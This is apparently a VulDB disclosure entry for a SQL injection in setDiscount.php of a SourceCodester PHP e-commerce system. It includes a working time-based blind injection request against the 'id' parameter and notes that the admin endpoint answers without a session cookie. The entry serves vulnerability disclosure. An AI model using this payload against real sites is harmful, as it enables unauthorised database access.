| 标题 | E-Commerce System setDiscount.php SQL Injection Vulnerability |
|---|
| 描述 | E-Commerce System has a SQL Injection Vulnerability , the vulnerable URI is '/ecommerce/admin/settings/setDiscount.php?id=201737' , and the injectable parameters is id
A time-based blind poc is below:
GET /ecommerce/admin/settings/setDiscount.php?id=201737 AND (SELECT 8973 FROM (SELECT(SLEEP(5)))OoAD) HTTP/1.1
And server will also response even if there's no cookie in the header, which is an improper access control. |
|---|
| 来源 | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| 用户 | WWesleywww (UID 43117) |
|---|
| 提交 | 2023-03-20 08時07分 (3 年前) |
|---|
| 管理 | 2023-03-20 08時33分 (26 minutes later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 223409 [SourceCodester E-Commerce System 1.0 setDiscount.php 标识符 SQL注入] |
|---|
| 积分 | 20 |
|---|